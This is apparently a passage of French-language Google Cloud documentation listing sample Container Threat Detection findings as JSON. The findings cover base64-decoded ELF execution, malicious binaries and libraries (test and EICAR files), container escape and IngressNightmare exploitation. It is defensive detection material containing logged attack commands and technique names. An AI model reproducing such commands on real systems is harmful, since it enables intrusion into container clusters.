"0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"base64\"", "\"-d\"", "\"f0VMRgIB\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_base64_elf_file_cmdline" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0005/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection" } ], "relatedFindingUri": {} } }, }
Contournement des défenses : script shell encodé en base64 exécuté
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Base64 Encoded Shell Script Executed", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "DATA_ENCODING", "STANDARD_ENCODING" ], "additionalTactics": [ "COMMAND_AND_CONTROL", "EXECUTION" ], "additionalTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER", "UNIX_SHELL", "OBFUSCATED_FILES_OR_INFO", "DEOBFUSCATE_DECODE_FILES_OR_INFO" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/usr/bin/base64\"", "size": "39096", "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84", "hashedSize": "39096", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"base64\"", "\"-d\"", "\"f0VMRgIB\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_base64_encoded_shell_script_executed" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0005/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection" } ], "relatedFindingUri": {} } }, }
Exécution : binaire malveillant ajouté exécuté
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "category": "Execution: Added Malicious Binary Executed", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-11-13T19:51:22.538Z", "database": {}, "eventTime": "2023-11-13T19:51:22.383Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "default", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "NATIVE_API" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"", "size": "68", "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "hashedSize": "68", "partiallyHashed": false }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.68.2.129:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-added-test-malicious-binary\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.68.2.129\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.68.2.129:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.68.2.129\"" }, { "name": "\"PWD\"", "val": "\"/malicious_files\"" } ], "pid": "7", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "added_malicious_binary_executed" }, "detectionPriority": "CRITICAL", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1699905066", "nanos": 618571329 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1106/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection" } ], "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Exécution : bibliothèque malveillante ajoutée chargée
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "category": "Execution: Added Malicious Library Loaded", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-11-13T21:40:14.340Z", "database": {}, "eventTime": "2023-11-13T21:40:14.209Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "default", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "SHARED_MODULES" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/malicious_files/drop_mal_lib\"", "size": "5005064", "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb", "hashedSize": "5005064", "partiallyHashed": false }, "libraries": [ { "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"", "size": "68", "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "hashedSize": "68", "partiallyHashed": false } ], "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"/malicious_files/drop_mal_lib\"", "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.108.174.129:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-added-malicious-library\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.108.174.129\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.108.174.129:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.108.174.129\"" }, { "name": "\"PWD\"", "val": "\"/malicious_files\"" } ], "pid": "8", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "added_malicious_library_loaded" }, "detectionPriority": "CRITICAL", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1699911603", "nanos": 535268047 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1129/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection" } ], "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Exécution : binaire malveillant intégré exécuté
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "category": "Execution: Built in Malicious Binary Executed", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2023-11-13T21:38:57.405Z", "database": {}, "eventTime": "2023-11-13T21:38:57.250Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "default", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE" } ] }, "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "NATIVE_API" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/malicious_files/eicar_testing_file\"", "size": "68", "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f", "hashedSize": "68", "partiallyHashed": false }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false }, "args": [ "\"/malicious_files/eicar_testing_file\"", "\"built-in-malicious-binary-818358caa95b6d42\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-built-in-malicious-binary\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"10.77.124.129\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://10.77.124.129:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"10.77.124.129\"" }, { "name": "\"PWD\"", "val": "\"/malicious_files\"" } ], "pid": "7", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "built_in_malicious_binary_executed" }, "detectionPriority": "CRITICAL", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1699911519", "nanos": 603253608 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1106/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal IP Link", "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection" } ], "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER" } ], "relatedFindingUri": {} } } }
Exécution : fuite du conteneur
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Container Escape", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2024-10-21T19:08:35.255Z", "database": {}, "eventTime": "2024-10-21T19:08:35.091Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2024-10-21T19:07:41.503072537Z" } } ], "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "USER_EXECUTION" ], "additionalTactics": [ "PRIVILEGE_ESCALATION" ], "additionalTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-container-escape-suspicious-tool-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_container_escape" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1611/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection" } ], "relatedFindingUri": {} } }, }
Exécution : exécution de la faille IngressNightmare (aperçu)
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Execution: Ingress Nightmare Vulnerability Exploitation", "chokepoint": {}, "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-04-17T18:54:09Z" } ], "createTime": "2025-04-17T18:54:14.136Z", "database": {}, "dataProtectionKeyGovernance": {}, "eventTime": "2025-04-17T18:54:13.952Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-04-17T18:54:09Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-04-17T18:54:09.924746656Z" } } ], "mitreAttack": { "primaryTactic": "EXECUTION", "primaryTechniques": [ "SHARED_MODULES" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/tmp/nginx\"", "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"/tmp/nginx\"", "\"/proc/1/fd/1\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": 